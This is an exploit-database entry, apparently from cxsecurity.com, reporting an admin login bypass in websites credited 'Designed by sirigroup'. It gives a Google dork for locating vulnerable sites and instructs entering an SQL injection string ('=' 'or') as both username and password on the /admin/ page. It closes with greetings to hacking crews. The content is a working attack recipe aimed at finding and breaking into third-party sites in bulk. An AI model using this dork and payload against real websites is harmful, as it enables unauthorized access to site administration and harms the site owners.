Designed by sirigroup Vulnerability Bypass Admin Login

2021.02.07
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Title : Designed by sirigroup Vulnerability Bypass Admin Login # Date : Februari/06/2021 # Author: Jenderal92 # Vendor : https://sirigroups.com # Category:webapps # Tested On: Android 9, Chrome # Exploit : /admin/ or [path]/admin/ # Google Dork : intext:"Designed by sirigroup" # Proof Of Concept : # Dorking Using Dork Above, Put The Exploit # exp : site.com/admin/ # Fill in the username and password # Username : '=' 'or' # Password : '=' 'or' # Greetz : Baku Hantam Crew - Purwokerto Ghost - Ajibarang1337

References:

https://www.blog-gan.org/2021/02/designed-by-sirigroup-vulnerability.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top